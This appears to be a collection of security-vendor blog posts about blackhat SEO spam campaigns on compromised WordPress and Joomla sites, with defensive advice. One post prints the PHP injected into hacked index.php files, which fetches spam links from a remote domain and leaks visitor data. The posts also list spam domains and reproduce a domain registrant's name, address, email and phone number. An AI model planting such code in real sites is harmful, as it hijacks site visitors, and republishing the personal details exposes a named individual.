Python: No such file or directory – Your site is likely compromised

If you run a WordPress site and you are seeing the following error at the top of your pages:

sh:  /usr/local/bin/python: No such file or directory

It means that it is likely compromised. How do we know that? We were tracking a large blackhat SEO spam campaign (targeting WordPress sites) and we noticed that for the last few days one of their link distrubution domains were broken and generating an error. So any hacked site would display that error instead of showing the spammy links.

This is the code that caused it (added to the index.php of the hacked sites):

<?php
        $url = "http://apollos&#46com&#46tw/LHRS/12/request&#46php?ip="&#46$_SERVER['REMOTE_ADDR']&#46"&useragent="&#46urlencode($_SERVER['HTTP_USER_AGENT'])&#46"&referer="&#46urlencode($_SERVER["HTTP_REFERER"]);
        $answer = file_get_contents($url);
        if (strpos($answer,"noredirect") === false) {
                echo $answer;
        }
?>

As you can see, it attempts to connect to apollos.com.tw to get the list of links to display. However, if you access this domain now you will get a python error instead…

Those are some other domains being used in this spam campaign:

apollos.com.tw
coolbloglinks.com
iqitiq.com
readerspot.com
tsarstvonebesnoe.ru
wat.az

If you are unsure if your site is compromised, try doing a quick scan here: http://sitecheck.sucuri.net

Links Injection on WordPress – Blackhat SEO Spam (basicpills) update

For the last few months we’ve been tracking a very large blackhat SEO spam campaign initiated by basicpills.com, and many other pharma-related domains (mostly located at 212.117.161.190 and 212.117.168.214).

The method used is very simple, where the attackers inject a single spam link on every post of the web site (generally WordPress). These are some of the links you will see in an infected site:

<a href="http://247pharmaceutical. com/">online prescription drugs without  a prescription..

<a href="http://webemed. com/">Buy  Generic  Cialis Onlin.

<a href="http://getrxpills . com/buy/levi tra.html”>lev itra 10 mg..

The really annoying part is that the domain and anchor text change on every post, making it very hard to delete and detect. These are some of the domains being used:

247pharmaceutical.com
acomplia-online-price.com
acomplia-online-price.net
amoxil-cheap.net
amoxilpharm.com
ampicillin-pharm.com
ampicillin-pharm.net
ampicillin-pills.com
ampicillinpills.com
ampicillin-pills.net
ampicillinpills.net
antibioticsordrer.com
antibiotics-shop.com
basicpills.com
buydiflucancheap.com
buyflagylcheap.com
buylasixcheap.com
buyLasixcheap.com
buylevaquincheap.com
buynolvadexcheap.com
camagracheap.com
camagracheap.net
camagra-pharm.com
camagra-pharm.net
cheappillsonline.net
cialis-online-price.com
cialis-online-price.net
cialis-pharm.com
cytotecbuyonline.com
dacompliasale.com
dlevitraonline.com
dzithromaxsbuy.com
e-pharmacy-online.com
generic-ed-pharmacy.com
getrxpills.com
great-levitra.com
healthcarexyz.com
kamagrasorder.com
levitra-online-price.net
onlineacompliacheap.com
onlineacompliacheap.net
onlinecialischeap.com
onlinecialischeap.net
onlinelevitracheap.com
onlinelevitracheap.net
onlineviagracheap.com
onlineviagracheap.net
peampicillinonline.com
rx-prices.com
sclomidbuy.com
sdoxycyclinebuy.com
softviagraonline.com
spropecia-online.com
spropecia-online.net
sviagrarbuy.com
viagra-online-price.com
viagra-online-price.net
vicialisabuy.com
webemed.com
westernunion-locations.com
women-health-shop.com
wpropecianonline.com

Some of these domains are being registered through Godaddy by:

Administrative Contact:
York, Steve york71steve@yahoo.com
6041 Pierless Ave
Sugar Hill, GA 30518
United States
7709450281 Fax —

And we would love to get them disabled.

For the site owners out there, you can check if your site has been infected by scanning it with our malware and spam scanner. It will show if these links have been added, and if you have other security issues. If your site has been hacked, we recommend changing your DB passwords immediately, and checking the permissions of your wp-config.php file.

If you need help cleaning up the mess, send us an email support@sucuri.net, or visit us over at Sucuri.

If you have any questions or comments, please let us know.

Link injection on hacked WordPress sites – Blackhat SEO spam

The last few months we’ve been tracking, and helping webmasters affected by a very large blackhat SEO spam campaign initiated by basicpills.com, and many other domains located at 212.117.161.190.

This campaign has infected thousands of WordPress sites, and has injected spam links directly into their databases (the wp-post table). These are some of the links you will see in an infected site:

<a href="http://basicpills . com/">online prescription drugs without  a prescription..

<a href="http://generic-ed-pharmacy . com/">Buy  Generic  Viagra Onlin.

<a href="http://getrxpills . com/buy/levi tra.html”>lev itra 10 mg..


Read More

Solution for the link injection spam from basicpills

We recently posted about a large scale blackhat SEO campaign by basicpills that infected thousands of WordPress sites over the last few weeks. A lot of people contacted us for help and asked for directions on how to remove those links from all their posts. On large WordPress sites, it can be a very tedius task to go through thousands of posts manually removing each link spam…

To help out, we posted a clean up script here http://tools.sucuri.net/malware/helpers/spam-postremoval.txt for anyone that needs to clean up their site. It will remove link spam from the 4 domains that are the most commonly used in this attack:

Read More

Link injection, basicpills dot com and Blackhat SEO spam

For the last few weeks we’ve been tracking a very large blackhat SEO spam campaign initiated by basicpills.com, generic-ed-pharmacy.com, getrxpills.com and a few other domains (all located at 212.117.161.190).

They basically infected thousands of WordPress sites and inject spam links directly in their databases (the wp-post table). These are some of the links you will see in an infected site:

<a href="http://basicpills . com/">online prescription drugs without  a prescription..

<a href="http://generic-ed-pharmacy . com/">Buy  Generic  Viagra Onlin.

<a href="http://getrxpills . com/buy/levi tra.html”>lev itra 10 mg..

What is very annoying for the infected site owners is that those links appear in the middle of the text (sometimes in the middle of other tags). This typically occurs in ALL of their posts making it hard to identify where the dirty links are, and even more of a challenge to remove them. In some of these sites, we’ve seen the attackers create new admin users allowing access back to the site at any time.

Read More

Grameen Bank web site hacked / infected with spam

The Grameen Bank is in the news today after one of its founders, Muhammad Yunus, was fired from it. You can see the news about it here.

Leaving the politics aside, what interested us is that their main web site is currently hacked and infected with blackhat SEO spam. We tried to contact them a few weeks ago about it, but got no reply (and the site remains hacked).

Even Google recently started to warn users about it with the following message: “This site may be compromised.” in the search results. Just search for “inurl:grameen.com” to verify it.

Grameen bank malware

How they got hacked? They are using a very old version of Joomla, which is probably how the attackers were able to get in. Our malware / spam scanner also finds those issues, which is only displayed to crawlers (not to normal users), which is a common technique on blackhat seo to increase their page rank.

This is the result of our scanner: http://sitecheck.sucuri.net/scanner/?scan=http://www.grameen.com/.

This shows again the important of keeping your sites updated and always monitored.

UCalgary web sites compromised with spam

We were cleaning up a compromised site today (with the unfamous pharma hack), when we saw multiple spam links in the hacked site pointing to ucalgary.ca (big Canadian university). What was interesting is that it was not pointing to a small department sub-domain, but to their main site.

It means attackers were using domains at the University of Calgary to help increase their PR (page rank) and to sell pharmacy related products online.

These were some of the links in their main site that were being used (still live):

Read More

Thailand official foreign affairs / embassy web sites hacked

The Royal Thai (Thailand’s) consulate and embassy web sites (part of their foreign affairs ministry) are currently hacked and infected with a lot of spam (of the pharmacy kind).

Their web site is located at http://www.mfa.go.th and with a quick scan (using our scanner) we can see all the hidden content:

Plus all their pages have multiple hidden links used on blackhat SEO spam campaings:

Read More

Large Blackhat SEO SPAM Campaign Targeting Joomla Sites

We are seeing a large number Joomla sites hacked and being used in a blackhat SEO SPAM campaign consisting of thousands of infected web sites. Most of them are small and using vulnerable and old versions of Joomla (1.0 and < 1.5.14).

This is how they show up in our scanner:

They all had the following code added to their index.php file to contact 188.72.201.11 and 209.160.33.108 to retrieve the list of links to show up:

Read More

Weekly Malware Update – 2010/Feb/11

Weekly malware update. You can track all updates by following our malware_updates category.

    *If your site has been affected with any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.

Pharma / Blackhat SEO Spam by stat-tracker.info and others

We are tracking a large number of web sites that got hacked and are redirecting users to pharmacy-related domains. All the sites had the following code added to their PHP files:

Which basically redirect the user if they came from a search engine. Domains used in these attacks (among many others):

stat-tracker.info
listita.info
babbyboom.ru
startds.net
agency-translation.com
bbt-tv.ru
dl.newsite.in

They just act as an intermediary before sending the user to sites like http://centerpills.com/ and similar (to buy fake pharmacy related products).

For hosting providers, I recommend blocking the following IP addresses: 178.238.134.8, 194.28.172.37 and 88.198.16.186.

All the sites infected had old/ vulnerable versions of web applications running. So make sure to keep your sites updated!


To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.